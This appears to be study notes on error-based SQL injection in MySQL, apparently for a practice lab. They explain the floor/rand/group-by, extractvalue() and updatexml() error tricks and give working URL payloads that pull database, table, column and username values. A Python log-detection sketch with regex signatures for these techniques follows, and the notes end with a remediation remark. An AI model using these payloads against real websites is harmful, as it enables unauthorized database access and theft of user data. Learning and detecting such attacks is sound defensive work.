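Applicable when the page does not echo query results: the injected statement forces a database error, and the information we want is returned inside the error message.
Common function 1: floor + rand combined with count + group by
rand() generates a random number between 0 and 1. Without an argument it is fully random; with an argument the sequence is fixed (repeated executions produce the same numbers).
floor() rounds down to an integer
group by groups rows
count() counts rows
concat(strings) concatenates strings
group_concat(column_name) concatenation function that joins the values of a column
Example:
# Trigger a database error so that the database name is shown in the error message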
?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+
# Find the table name
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 2,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
# Find the column name
?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand(0)*2)) as a from information_schema.columns group by a --+
# Find the field value
?id=-1' union select 1,count(*),concat((select username from users limit 1,1),floor(rand(0)*2)) as a from information_schema.columns group by a --+
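Common function 2: extractvalue() error
extractvalue(xml_object, xpath_str) returns the string found in the XML object; the returned length is limited to 32 characters. The xpath_str argument uses the format /xxx/xxx/xxx/; if it contains content that does not match this format, an error is raised.
Example: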
?id=1' and extractvalue(1,concat("~",(select database()))) --+
?id=1' and extractvalue(1,concat("~",(select table_name from information_schema.tables where table_schema='security' limit 1,1))) --+
Common function 3: updatexml() error
updatexml(xml_target,xpath_expr,new_xml)
xml_target: name of the XML object, a string
xpath_expr: a path in XPath format; a value that does not match the format raises an error, for example a path containing the ~ character
new_xml: the content to update with
Example:
?id=1' and updatexml(1,concat('~',(select database()),'~'),1) --+
?id=1' and updatexml(1,concat("~",(select table_name from information_schema.tables where table_schema='security' limit 1,1),"~"),1) --+
?id=1' and updatexml(1,concat("~",(select column_name from information_schema.columns where table_name='users' limit 2,1),"~"),1) --+
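Seen from the defending side, the three techniques above leave recognizable function combinations in request logs. The following detection sketch is an added example, not part of the original notes; the request paths, parameter names and signature labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One entry per technique on this page; every pattern in a list must match.
SIGNATURES = {
    "floor-rand-group-by": [r"floor\s*\(\s*rand\s*\(", r"count\s*\(", r"group\s+by"],
    "extractvalue": [r"extractvalue\s*\("],
    "updatexml": [r"updatexml\s*\("],
}

def normalize(raw_query: str) -> str:
    """Decode twice (covers double URL-encoding), drop /* */ comments,
    collapse whitespace and lowercase, so the patterns see canonical text."""
    text = unquote_plus(unquote_plus(raw_query))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def detect(request_target: str) -> list[str]:
    """Return the sorted names of all techniques found in the query string."""
    query = normalize(urlsplit(request_target).query)
    return sorted(
        name for name, patterns in SIGNATURES.items()
        if all(re.search(p, query) for p in patterns)
    )

# Constructed request targets (hypothetical paths), as they would appear
# percent-encoded in a web server access log.
SAMPLE_REQUESTS = [
    "/item.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20database()),%27~%27),1)%20--+",
    "/item.php?id=1%27+AND+ExtractValue(1,concat(%22~%22,(select+database())))+--+",
    "/item.php?id=-1%27+union+select+1,count(*),concat((select+database()),"
    "floor(rand(0)*2))+as+a+from+information_schema.tables+group+by+a+--+",
    "/item.php?id=42&sort=updated",                 # benign
    "/search.php?q=group+by+tutorial+floor+plan",   # benign, shares keywords
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        hits = detect(target)
        print(("ALERT " + ",".join(hits)) if hits else "ok", "|", target[:60])
```

Detection of this kind only flags attempts; the error-based channel itself closes when queries are parameterized and database error text is never returned to the client.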